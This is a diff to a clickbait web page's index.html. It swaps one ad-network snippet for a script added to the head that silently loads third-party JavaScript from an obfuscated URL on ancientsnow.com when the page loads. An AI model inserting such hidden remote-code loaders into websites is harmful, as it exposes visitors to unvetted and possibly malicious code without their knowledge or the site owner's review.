--- a/index.html
+++ b/index.html
@@ -133,20 +133,23 @@
       display: none !important; 
     }
   </style>
+<script>
+(function(zxoi){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = zxoi || {};
+s.src = "\/\/ancientsnow.com\/csDg9\/6.bO2D5alOS\/WEQd9\/NRjwci5LNPT\/UCwdOLS\/0h2MNLzAkM1mN\/TKEBzx";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>	
 </head>
 <body>
 	
   <h1>Things got wet in there.</h1>
-	<script type="text/javascript">
-	atOptions = {
-		'key' : '4a2fc598ebbbdbc95eb3bef73798c939',
-		'format' : 'iframe',
-		'height' : 50,
-		'width' : 320,
-		'params' : {}
-	};
-</script>
-<script type="text/javascript" src="//www.highperformanceformat.com/4a2fc598ebbbdbc95eb3bef73798c939/invoke.js"></script>
+
   <figureitemscope itemtype="http://schema.org/VideoObject">
     <img src="10.jpg" alt="Things got wet in there."/>
         <meta itemprop="uploadDate" content="2025-08-028" />
